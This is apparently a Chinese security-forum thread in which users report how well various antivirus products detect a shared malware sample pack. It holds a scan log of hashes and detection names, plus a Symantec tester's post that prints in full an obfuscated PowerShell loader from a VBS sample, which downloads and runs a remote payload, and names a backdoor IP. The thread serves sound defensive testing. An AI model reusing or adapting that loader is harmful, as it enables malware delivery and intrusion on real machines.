【开放测试】卡饭病毒样本包 20240826 第160期

dght432

卡巴清空

白崎桑

奇安信清空

心醉咖啡

腾讯电脑管家

1. 【扫描信息】
   
2. 
   
3. 开始时间:2024-8-26 21:24:16
   
4. 扫描用时:00:00:01
   
5. 扫描类型:自定义扫描
   
6. 扫描状态:扫描完成
   
7. 
   
8. 
   
9. 【扫描结果】
   
10. 
    
11. 扫描文件数:62
    
12. 发现风险数:60
    
13. 已处理风险数:60
    
14. 
    
15. 
    
16. ---------------------
    
17. 2024-8-26 21:24:28 MD5:56fd972f1d650272de4508513de8a27d E:\浏览器下载\61x (2024-08-26)\1\01246ce06d56da2b83f49063e5277f08ba6a693646f8d388ae7da4caec915853.exe [Win32.Trojan.FalseSign.Lzfl]  [删除成功]
    
18. 2024-8-26 21:24:28 MD5:537f11e06b7cb27b9728f5ecde2f2f25 E:\浏览器下载\61x (2024-08-26)\1\57b29aed7eae1c61815cfa73b0d17177b96bdccc43ebc8616b32d94a65a04305.exe [Malicious]  [删除成功]
    
19. 2024-8-26 21:24:27 MD5:4726a6411ea09afa5736a5f6cfe72df0 E:\浏览器下载\61x (2024-08-26)\1\5d3125c5df560d899a483b65d52860905b9e0d85daa29ea96327c02aa8f4cd87.exe [Msil.Trojan-QQPass.QQRob.Iajl]  [删除成功]
    
20. 2024-8-26 21:24:27 MD5:7bb4fcf6d1832ec0feb1d0da64b3b2ba E:\浏览器下载\61x (2024-08-26)\1\989b7781d03f28deb22e694289a5806bdc4d921f4eb2cd61bede3bdaa8d1e933.exe [Win32.Trojan.Vbkrypt.Ikjl]  [删除成功]
    
21. 2024-8-26 21:24:27 MD5:3ab61ee8a81099edddf87af587420a10 E:\浏览器下载\61x (2024-08-26)\1\feba3474a30f9b010741c34ee4773777fc329390418713ffef424b2eb9243a5f.exe [Msil.Worm.Xworm.Bgow]  [删除成功]
    
22. 2024-8-26 21:24:27 MD5:94a6ad154ce2a06fdd87848c11eee24f E:\浏览器下载\61x (2024-08-26)\1\fcd70e52a1999d722bf450c56645b083bcf71e104b7610f3322a3de14c70db72.xls [Office.Trojan.Cve2017_0199.Zfow]  [删除成功]
    
23. 2024-8-26 21:24:27 MD5:c3db253c8d564df91fcf08b3c40bebba E:\浏览器下载\61x (2024-08-26)\1\fa1d31b87f283eeabf97d5968fff18f11d7e753df3967643bb8b44bfb6f3b09e.exe [Win32.Trojan.Stubo.Xfow]  [删除成功]
    
24. 2024-8-26 21:24:27 MD5:7586d565812943ae038f1a3957e14a65 E:\浏览器下载\61x (2024-08-26)\1\f976c7a1c21a08fefd4ada44c0398b78441fcaa910299ec40f3edab2daa49160.exe [Msil.Trojan.Agent.Rcnw]  [删除成功]
    
25. 2024-8-26 21:24:27 MD5:3f23f9bd4c5aa0bc03e54a9ad0652a0c E:\浏览器下载\61x (2024-08-26)\1\f6136388450cab059d5a48376a2ca6f83674546c6a9db8f06744524baf3c128e.exe [Win32.Trojan.Injuke.Ocnw]  [删除成功]
    
26. 2024-8-26 21:24:27 MD5:44eed1727bd787615c476d74543e2249 E:\浏览器下载\61x (2024-08-26)\1\f0ef5af83238e7388f455bcf3450d41139f7af88bcead9fb5f4de9bef1db493f.exe [Win32.Trojan.Ekstak.icnw]  [删除成功]
    
27. 2024-8-26 21:24:27 MD5:d55e92132ef858083189e4503118c540 E:\浏览器下载\61x (2024-08-26)\1\ee6618703044a333bdddc233db64ee46ea66d13f244169afa7e541c6244ceb14.exe [Win32.Trojan.Miner.Fwnw]  [删除成功]
    
28. 2024-8-26 21:24:26 MD5:eec2cc9a8b24371c7b26c64b08d99676 E:\浏览器下载\61x (2024-08-26)\1\ed16f3cbddb2e5263186d116f41823b63c0b5fc5f467b0155e8b7fdab348dc6b.exe [Win32.Trojan-Ransom.Crusis.Ewnw]  [删除成功]
    
29. 2024-8-26 21:24:26 MD5:ccb8ba2e5828a30d43113b6dc6c38dfa E:\浏览器下载\61x (2024-08-26)\1\ec2b9c75aae260aaa63c0f3d102b57de762895659d5e7339c5342dbe77f29878.exe [Win32.Backdoor.Agent.Dwnw]  [删除成功]
    
30. 2024-8-26 21:24:26 MD5:a0e1030b0002d26a5aa7770b076a86ef E:\浏览器下载\61x (2024-08-26)\1\e99dfc08c5ef50c923aa461264723b3c1041f1cfe76373ed42466e9d23f37f3f.exe [Win32.Trojan.FalseSign.vsmw]  [删除成功]
    
31. 2024-8-26 21:24:26 MD5:bb742b8bbfa3691e17a2fcbc633e6298 E:\浏览器下载\61x (2024-08-26)\1\e4115c3892919016cae5ba429b5d758a803c4ea568aff8a40b1055f02286345e.exe [Msil.Trojan-Dropper.Scrop.Qsmw]  [删除成功]
    
32. 2024-8-26 21:24:26 MD5:30bf4f5872fef62464c1b814b0f279cf E:\浏览器下载\61x (2024-08-26)\1\de99672cbba66fa5b8240a878d3b50134462c863623aabd59a99042cc5cb5579.exe [Msil.Trojan-Spy.Stealer.Jmnw]  [删除成功]
    
33. 2024-8-26 21:24:26 MD5:e1f802190de3f11b4014e527b02bb445 E:\浏览器下载\61x (2024-08-26)\1\de745350a2225bebb1900109525c353ef50f8168d33e516291d7b9254735b30d.exe [Win32.Trojan.Miner.Jmnw]  [删除成功]
    
34. 2024-8-26 21:24:26 MD5:826cdd28592464920aabb50ad10fc694 E:\浏览器下载\61x (2024-08-26)\1\c89b50e1bc1bd6221d55a91a7fd407a0bd8363a292506348bf2902078e141562.exe [Win32.Trojan.FalseSign.czlw]  [删除成功]
    
35. 2024-8-26 21:24:26 MD5:17a651534b86ce0683984d20a5ae8e24 E:\浏览器下载\61x (2024-08-26)\1\a1ef9950b2c2bab6fc3288a104fa7372804df05c9a0bee235ec0082cd7dda5af.vbs [Script.Trojan.Generic.dflw]  [删除成功]
    
36. 2024-8-26 21:24:25 MD5:be02035f9559cf4aba601b45a1677d92 E:\浏览器下载\61x (2024-08-26)\1\a1c29b281f03728b9c36b5e3425a3e4eefdbd1c237f5aa3f64983188b50a1495.exe [Win32.Trojan.FalseSign.Dflw]  [删除成功]
    
37. 2024-8-26 21:24:25 MD5:44fdccdfe8279d9ec373b44f0616b66a E:\浏览器下载\61x (2024-08-26)\1\88d62d9a4891acc8b0726994399c08e7cd11ea6887e4d8e17e1d44b59dbb897a.xls [Office.Trojan.Cve2017_0199.Majl]  [删除成功]
    
38. 2024-8-26 21:24:25 MD5:c82fa8804c0897f9864202f15fed43b3 E:\浏览器下载\61x (2024-08-26)\1\88bf3ddb39573efdb0c3540c5516d09c236efec7f361f89b87a6bc61afdb106f.exe [Win32.Trojan.FalseSign.Majl]  [删除成功]
    
39. 2024-8-26 21:24:25 MD5:c6eb9a4057ddf5e758ce3c4a1bdb9637 E:\浏览器下载\61x (2024-08-26)\1\87899e86552ad9086ad6d46ba2a30ad6ae66c3197ac00e250a7605df1ca8d303.exe [Win32.Trojan.Agentb.Lajl]  [删除成功]
    
40. 2024-8-26 21:24:25 MD5:9be6f648f18e83754d2ef71868264de7 E:\浏览器下载\61x (2024-08-26)\1\8690ab7ea4dbe67496c1648e55886c487fde8cfef4d67daa1454f2b368c568d0.exe [Win32.Trojan.FalseSign.Kajl]  [删除成功]
    
41. 2024-8-26 21:24:25 MD5:3096f8476512077adacad2e66cd9535e E:\浏览器下载\61x (2024-08-26)\1\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs [Vbs.Trojan.Sagent.Yylw]  [删除成功]
    
42. 2024-8-26 21:24:25 MD5:5bc8c4f65272ebf27ac5d04d799cc3de E:\浏览器下载\61x (2024-08-26)\1\bdd678604bbefecbc2b54dfd55b1cd677e151bf1e5ee59ab2860363c27d73d16.vbs [Script.Trojan.Generic.qsmw]  [删除成功]
    
43. 2024-8-26 21:24:25 MD5:329dfc361f947067523bc6bd4ede3704 E:\浏览器下载\61x (2024-08-26)\1\babc0e3f52501b3128c5b0d806696a82c6575d7194a721d0e354d9bc7b077d91.vbs [Script.Trojan.Generic.nsmw(aiScore=m)]  [删除成功]
    
44. 2024-8-26 21:24:24 MD5:f88c0995e7e4569ce2a5c06eb1660cf6 E:\浏览器下载\61x (2024-08-26)\1\afdb413119fa2e0755a4885146d44547b97096d700d2b1236c6aba8f9bb9719d.exe [Win32.Trojan.FalseSign.Wimw]  [删除成功]
    
45. 2024-8-26 21:24:24 MD5:d58ddba7f2d064d327f45f577f2e41ec E:\浏览器下载\61x (2024-08-26)\1\adb28aea89e43cd649e1750d37c1744b176484e59d89a13c047760786cd05220.exe [Win32.Trojan.FalseSign.Uimw]  [删除成功]
    
46. 2024-8-26 21:24:24 MD5:17eb8202cd25ebfb49eb1347ddbbe1d1 E:\浏览器下载\61x (2024-08-26)\1\a7ce140d12ae3b2180a2f170bd9cf812034046b5b4da2bc0725240445264a404.exe [Win32.Trojan.FalseSign.Jflw]  [删除成功]
    
47. 2024-8-26 21:24:24 MD5:7545b8b43866b15dd9dff94588c4c6bf E:\浏览器下载\61x (2024-08-26)\1\8586e26ad8c071ae7aed383edf5bef7e1d48f6e019c05b90eaa0a24e592fafd9.exe [Win32.Trojan-QQPass.QQRob.Jajl]  [删除成功]
    
48. 2024-8-26 21:24:24 MD5:972a59032c2fff4694784d259a161589 E:\浏览器下载\61x (2024-08-26)\1\8050bf9f3e5bbe4f9e459f3b6a891bacb69c38a97de239444f878ebcb2e27689.doc [Office.Exploit.Generic.Eajl]  [删除成功]
    
49. 2024-8-26 21:24:24 MD5:2f664cdb97df849ffae2f53ef1a3c6c9 E:\浏览器下载\61x (2024-08-26)\1\7ed9c4dde62651bfa4e2659df75148d85d3b7f055dc345dd4a229f99de0d0286.exe [Win32.Trojan.Cobaltstrike.Bujl]  [删除成功]
    
50. 2024-8-26 21:24:24 MD5:20df8af8ca6966315c17255ccde5e908 E:\浏览器下载\61x (2024-08-26)\1\780ac3f44f6f73f053d93a7777003231614cbd95da0bdaeb0eb4dbe215ba6bef.exe [Win32.Backdoor.Cobalt.Qqil]  [删除成功]
    
51. 2024-8-26 21:24:24 MD5:a838dbb4bc72c5b3a578278104bc8452 E:\浏览器下载\61x (2024-08-26)\1\752f0ab0ce3005d0f58771a94dac93113c3940ad4f79655b430efa7f4ad86d66.exe [Win32.Trojan-Spy.Noon.Nqil]  [删除成功]
    
52. 2024-8-26 21:24:24 MD5:576b8c2a66fc8658ad772cef9b9fa63d E:\浏览器下载\61x (2024-08-26)\1\74686f9367ab392ede4c470b647e1eb5a6e26106ef6ed46dc3d48e3348fdafb6.dll [Win32.Trojan-Downloader.Cobalt.mqil]  [删除成功]
    
53. 2024-8-26 21:24:24 MD5:d21a5438127ca1601450ad3685dce4ae E:\浏览器下载\61x (2024-08-26)\1\741fbb3f70e2e16f89a057e60535769624d63754c3436a416a29a61646101d49.exe [Win32.Trojan.Miner.Mqil]  [删除成功]
    
54. 2024-8-26 21:24:24 MD5:ddcd5c52e63a4df0de291d5c6c5c0ff9 E:\浏览器下载\61x (2024-08-26)\1\6bb2386101837fd4e8a32018f2d8ec5bbd646bef9a5513783f782fe2ae1ff3e0.exe [Msil.Trojan.Agent.Ckjl]  [删除成功]
    
55. 2024-8-26 21:24:24 MD5:423096bec370beafb195167dcf50efbd E:\浏览器下载\61x (2024-08-26)\1\67a549acc82bb89265859ebfa67fab003eb43884f847e754bc0a8ca631ca3c1c.exe [Win32.Trojan-QQPass.QQRob.Tgil]  [删除成功]
    
56. 2024-8-26 21:24:23 MD5:de64bb0f39113e48a8499d3401461cf8 E:\浏览器下载\61x (2024-08-26)\1\64b58794801f282e92571676e3571afc5c59033c262406bf0d36e1d6ef3cda6a.exe [Msil.Trojan-Downloader.Ader.Qgil]  [删除成功]
    
57. 2024-8-26 21:24:23 MD5:71a3bc1ff0e3828d7adfe71aff2ba94b E:\浏览器下载\61x (2024-08-26)\1\60734325fb48873fcbe11315a91032bef2048981cd35cdd24c6502cb81b03d92.exe [Msil.Trojan-Spy.Stealer.Mgil]  [删除成功]
    
58. 2024-8-26 21:24:23 MD5:40983a5ca55c94f5e1095e63850317b0 E:\浏览器下载\61x (2024-08-26)\1\5ebfa2e9d5c8fd6ecb9062ac8843e93886b2a744f34ccf93ab4395504e6b1d2a.vbs [Vbs.Trojan.Sagent.jajl]  [删除成功]
    
59. 2024-8-26 21:24:23 MD5:fcde4ad6797205d12fa4768ae12ebb7c E:\浏览器下载\61x (2024-08-26)\1\5c335c0a2fcfec26023d5479134e4cd35efaddc2d13cbc789628114837c2015d.exe [Malicious]  [删除成功]
    
60. 2024-8-26 21:24:23 MD5:8cd2fcbdb7c120325a6b3ef3f65f269e E:\浏览器下载\61x (2024-08-26)\1\5ac4737530d0463a83d55f70791cb5b7bfe8f4640d50afa7e55451be35e1318d.exe [Msil.Trojan.Agent.Fajl]  [删除成功]
    
61. 2024-8-26 21:24:23 MD5:8e58dd815e934bdebbc24f8c121f2dd0 E:\浏览器下载\61x (2024-08-26)\1\57110f558891f59471e6fe8c2f18ceb594db427d77825544262345ea19a252dd.exe [Win32.Trojan.Generic.Xwhl]  [删除成功]
    
62. 2024-8-26 21:24:23 MD5:46ebd2c48e2a3d8a8d1e2f7c08616e1d E:\浏览器下载\61x (2024-08-26)\1\56062d73851d4dac858be4616a3aedeb7fd10b36d9a3bebe4ff9911508dc8b1a.exe [Win32.Trojan.Generic.Wwhl]  [删除成功]
    
63. 2024-8-26 21:24:23 MD5:70796cac6b08182a78a1d7b3062a0e30 E:\浏览器下载\61x (2024-08-26)\1\54330d7c8d654c7821fdd80c29bbad67e1f959fb668a63c433348182f879a101.exe [Win32.Trojan-QQPass.QQRob.Uwhl]  [删除成功]
    
64. 2024-8-26 21:24:23 MD5:769c7764ecf05cab1c70d9a36a9e888c E:\浏览器下载\61x (2024-08-26)\1\4fed7419c9b368691f2901f96b06a0d81a1f5150ffc7d62bd993a93ef62ed8c1.xls [Office.Trojan.Cve2017_0199.Oqil]  [删除成功]
    
65. 2024-8-26 21:24:23 MD5:9f31e7ec269ef7f755b7bd75e0579b18 E:\浏览器下载\61x (2024-08-26)\1\4ab223a4ed0eaced6dc3a2cc74953a453770bb030336f349cd37f2ef24b65c30.vbs [Script.Trojan.Generic.jqil]  [删除成功]
    
66. 2024-8-26 21:24:23 MD5:b644c424951f138716f141c835d2206d E:\浏览器下载\61x (2024-08-26)\1\482c9abcdd9f5e307c2669d18848014be4b0b67219534b17c4046dd87f58a842.exe [Msil.Trojan-Spy.Stealer.Cnhl]  [删除成功]
    
67. 2024-8-26 21:24:22 MD5:31e3b957381af1599cc673311d477601 E:\浏览器下载\61x (2024-08-26)\1\43fb165430900357661675fd65edc666c9f96f928d6f91e979843f333e9d742c.exe [Win32.Trojan.Miner.Xmhl]  [删除成功]
    
68. 2024-8-26 21:24:22 MD5:3959e1b19549d7eef62681d7d954bc4f E:\浏览器下载\61x (2024-08-26)\1\41f293ce313419147aa284c4e2a83471edb2deb9a6e1125a3fa754af52e96331.exe [Msil.Trojan-QQPass.QQRob.Vmhl]  [删除成功]
    
69. 2024-8-26 21:24:22 MD5:b69c290b1198d0e4c32f33b03d868472 E:\浏览器下载\61x (2024-08-26)\1\41076a7c6543504a0f6a1376779ff9c6a768a8eee77fb8ceb72ec50a81a34a50.exe [Win32.Trojan.FalseSign.Vmhl]  [删除成功]
    
70. 2024-8-26 21:24:22 MD5:f39a83910b2f8e93c57e5e8517ed1a92 E:\浏览器下载\61x (2024-08-26)\1\0f8726a3109c923ef18b069db6b1d37ee5b01d7a183d5be31070836885e3517f.exe [Msil.Trojan.Agent.Edhl]  [删除成功]
    
71. 2024-8-26 21:24:22 MD5:8a9d62671157e1019b364ff4c969706e E:\浏览器下载\61x (2024-08-26)\1\3f4d5fe2b6f66d5e93571f72468cddbc9924d3b2d0d7d68a9b21ce8956a63964.xls [Office.Trojan.Cve2017_0199.Sgil]  [删除成功]
    
72. 2024-8-26 21:24:22 MD5:5e7c5bff52e54cb9843c7324a574334b E:\浏览器下载\61x (2024-08-26)\1\32768587423824856dcd6856228544da79f0a2283f822af41b63a92b5259c826.exe [Msil.Trojan-Downloader.Ader.Adhl]  [删除成功]
    
73. 2024-8-26 21:24:22 MD5:87e99ab17b577782dee5cfb83f678b21 E:\浏览器下载\61x (2024-08-26)\1\26584a48272ebb5b538bfbf92017c1b30e444b76a941fd63103941d52a490394.exe [Win32.Trojan.FalseSign.Itgl]  [删除成功]
    
74. 2024-8-26 21:24:22 MD5:1298423be67a0f14a71be6e0d70a67e2 E:\浏览器下载\61x (2024-08-26)\1\228a88566652d048dc6031e51003ab7b192c2e0341d4df50e3119a33cb3119ef.exe [Win32.Script.Agent.Etgl]  [删除成功]
    
75. 2024-8-26 21:24:22 MD5:bacaf023d27109a446220e48b7a1c60e E:\浏览器下载\61x (2024-08-26)\1\1ac77b641f98af7d2d5f052af2721c8154b8c922be31ea7914ea76bd8c6d17c1.exe [Win32.Trojan.FalseSign.Vmhl]  [删除成功]
    
76. 2024-8-26 21:24:22 MD5:cbc0c7de20d6f1d9b8967ea6d47ded9d E:\浏览器下载\61x (2024-08-26)\1\1ab7f3c6d35915a4a4c3b329955230d8206cb1f479262830ab6f88125f4044c2.exe [Msil.Trojan-Downloader.Ader.Vmhl]  [删除成功]
    
77. ---------------------
    

复制代码

GreatMOLA

Symantec 静态 57x


5ebfa2e9d5c8fd6ecb9062ac8843e93886b2a744f34ccf93ab4395504e6b1d2a.vbs

1. "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Serpentarian19='SUBsTR';$Lacertose++;}$Serpentarian19+='ing';Function Overpopulate($Underset){$Gaudfulnkaminationer=$Underset.Length-$Lacertose;For( $Gaudful=2;$Gaudful -lt $Gaudfulnkaminationer;$Gaudful+=3){$Hatters+=$Underset.$Serpentarian19.'Invoke'(     $Gaudful, $Lacertose);}$Hatters;}function Udstes($hestestutterier){ &   ($Proclivous) ($hestestutterier);}$Usaarbart=Overpopulate '  MpuoP.zS iUnl ilHaaT,/su5Ma.In0mu  Q(DeWKriS nSpdSlo sw Ss H  ,NP.T R ,a1 F0 a.Pa0Ga;Se spW,fi GnGr6Ru4  ;br C x,p6Ty4 ,;J,   r avO.:.a1 y2Ko1Ap.L.0Z.)H,  DGC e ,cFik Door/K,2St0Ma1Ej0E 0G.1Co0Br1 S   FFli Ar,ue,rflio wxP /Ra1S.2St1E..Ma0H. ';$Demodulatorerne=Overpopulate ' rU csl eBer H-HiA tgOreNonclt.a ';$Offervilligeres=Overpopulate 'Anh nt Ct spDisI,:Dy/S,/MitP,rR.i,rcCoo .tP,eSuxC bEraBecSpaChuco.FirD.oCr/S,w,ipS.- pa.rd.emU,iFinRa/QuuAnsdre ,r.asPa/U,F.rrFie,ed ,eAnl .i .gLegB,rGye Fn.hd,ieRh.ApqCrxStd ,>F,h.rtOrt,ap ,:Tu/.a/ ,chopInaA,n,teKol B- Pap dFrm SiBjnDihH.o .s ItNo. NcNooElmge/BeF.orL.evodIne RlTriPegh,g.krBreAdnGed aeFr.Roq,lxA.dU  ';$Affaldsdyngerne20=Overpopulate 'Oz>Bl ';$Proclivous=Overpopulate ' ki SeOuxKo ';$Derier79='Expectance';$Gelfomino = Overpopulate 'Fee ,cGrh noNo  .%T,aNepSkp ldUna Et oa  %B,\PrRCra Bt riPeoSp. SA uc lcIn .u&.t&D, M,eHjcYeh RoRe .ht T ';Udstes (Overpopulate 'H $ TgCal CoOvb Ca tl ,:TeOE v LeH.r RfStlPlsAloMemFom leSy2Le2Pr6Sn=Li(Frc smTrdLe .p/ AcGa De$ .GA e Nl ef AoPamimi,pnBeoKl)S  ');Udstes (Overpopulate ' O$AngOplTioUpbGla tlUn:Prh hoBid Ag HeJ pGuoMud ,geneRy= T$.iOSnf,ef,eeBrr ,v  iStlW.l  ispg  eKir.keKas A.Ins ,pBalTuishtFo(Sy$alA ,fO f  a,ol Bd .s,adPryOpnRegT eMirB.n LeBe2 E0Fi) t ');Udstes (Overpopulate 'Pr[ INN,eCetle.HySMeeS,r  vT,iFlcade PPAcoSoiStn.pt DM.oa Vn ,aC,gBle erCl]S.: B:T SR.e Nc ,u lrAli,lt FyDeP  r Oo St eo ncPao LlHa Bo= h  S[MiNPleR,tMe.,aS Ue ,c TuParB,i NtSuy HPj,r,eo TtSvoUrc  o kl.fTQuyr pUne K] .: ,:.aTTolBlsdg1 F2Ha ');$Offervilligeres=$hodgepodge[0];$Sskendeflok= (Overpopulate 'Fa[        DISCUZ_CODE_31        ]nbsp; g .lGroc,bGaa.olNa:JaB  e.esFiu.pdSplCoeI tUn=ReN,aeS.wLi- POPlbFrjUneDocU tDe  SS,oyt sEttSeeU.mba.GeNO,eRat.r.AnWMaeR,bSaCM.lKri De ena,t');$Sskendeflok+=$Overflsomme226[1];Udstes ($Sskendeflok);Udstes (Overpopulate ' M$ oB ke ,sheuAldH.l,aerntDe.S,HEieDaaDed ee.ar.os i[,k$EnDS eTimPoo pdPauAulBraAatInoN r,beInrgrnChe P]Sk=Re$F,U CsSla  a  rAfb HaM.rU,t r ');$Inchoation=Overpopulate 'Me$TrBHyeU,s FuOsdAmlBreBrts .PsDImoSkwFon.olCroM.aRed.nF,eisalb.eHo( F$NeORefAtf eeIarPovteiLalFol ViBegMaeGorU.eNossp,,a$StT Oz BaRorPrdWao.am.o) k ';$Tzardom=$Overflsomme226[0];Udstes (Overpopulate 'Da$RegPhlAfo ,bUoa,alab:.npO.eF,aFrr .tGeeMenK,=Sk(.cTPheA.sAft ,-FoPDea.otKnhB.  a$.rT TzUda TrO.dHaoFdmUn)Up ');while (!$pearten) {Udstes (Overpopulate ',l$S.g  lV.oTibRaa.ulSk: PkApa ,mO ePtlCau  lKadBrsRafA.rMaa vkFykTreUn=.e$ Gtd.rT u aeBe ') ;Udstes $Inchoation;Udstes (Overpopulate ' CSS tIna Mr,ntb,- CSS.lb,eFaeSnpGa  e4 P ');Udstes (Overpopulate ' .$GygBel,koRubwiadulmi: op Oepoa CrBrt,ie rnCh=M,(.uTWee UsDotUn-,kP Pa ,tSth   re$TrTOvzKoaTor ,d .oInmPr) , ') ;Udstes (Overpopulate 'Ne$ .gUnlTaoSkb La Dl.o:,ltS aEkkPhnPheBum kmReeInlD iArgErhF.eTrdRa=Vi$U.g.ylTao,ub,sas.l C:thO,nxG i ed AeStrameNenKnd ceFis F+ u+,a%,n$ ,hKooBedT,gFoe ,pRko,edspg ,ePe.GacBeo iu .nentOp ') ;$Offervilligeres=$hodgepodge[$taknemmelighed];}$Rackers=341780;$Rejuggle=26949;Udstes (Overpopulate 'Br$Fag el.loAfbVeaCulSi:BePnoiFll toF,tHjeDanFr4Ry7.p P =Ta HeGSheBatM.-FaCMyofonFrtH eD,n Vt A .a$ ,T AzSeaSnrStd  oRomm  ');Udstes (Overpopulate 'Bl$SegD lAsoB,bFoa.rl P: MTBerSeoHas hsS.a,pm .fB uL nF.dResKd   =s,  i[r.SS,yP.s TtLae,lm ,. aC BoLenOvv .eSorM,tbi]Ro:Se:PaFTrrGro,emSjBSmaArsteeMi6 ,4ViSSat .r SiM nJogTe(an$NoP SiBal.gorvt fe,lnsa4.r7el)Gl ');Udstes (Overpopulate 'Sm$,ugUnlCoo.mbLoaPrl,v: FOSkpPasPomApn ii enCag leDirGos n B.=P  Ej[GaSAfyCrsS tFoeOvmUd..oT,aev.xMitFo.AfEDonFucFooHod.yiErnS,gUn]Af:Ru:QuA.eSP.C ,ISyITr.TiGKaeS tKaSEttPor,iiDdnKugKi( A$.iTRerBooHasAssMia  m efC.uNon  dAnsLi) , ');Udstes (Overpopulate ' G$FogKolBaotob HaRolPl: oUT a.arPrtIoiHagSheUdsE,= F$PoO ,pC,sSum FnO.iAnnD.gthePirM s e.Res,ouEnb  sLrt.nr iiUdnOugA.(Ri$ TR,ta Nc AkMaeSarDessa,Ta$StR ReBojMauEvg,ogKolFeeIl) E ');Udstes $Uartiges;"

复制代码

EDR 告警: Powershell launched with suspicious command and attempting process injection using process hollowing technique、Microsoft signed process used process hollowing technique - Method 2


IPS 拦截: Trojan.Backdoor Activity 757, IP: 172.111.137.133



SONAR 检测: wscript.exe；关联补救: wab.exe



a1ef9950b2c2bab6fc3288a104fa7372804df05c9a0bee235ec0082cd7dda5af.vbs



bdd678604bbefecbc2b54dfd55b1cd677e151bf1e5ee59ab2860363c27d73d16.vbs



c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs

双击后立即检测:



EDR 告警: PowerShell dropped a malicious file、Microsoft signed process launched suspicious windows process - Method 89



SONAR 检测 (对释放的 exe c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs
.exe): SONAR.SuspLaunch!g89

YU2711

McAfee 清空


Apex One 50x


双击阻止或删除衍生物6x

光阴的故事2008

金山毒霸kill  57X  

ジ蓅暒划过づ

EIS  机学恶意软件和可疑应用程序具有攻击性
右键扫描：57X  剩余4 二扫云杀2个，剩余2X

qqqq47

火绒杀了46个

123456aaaafsdeg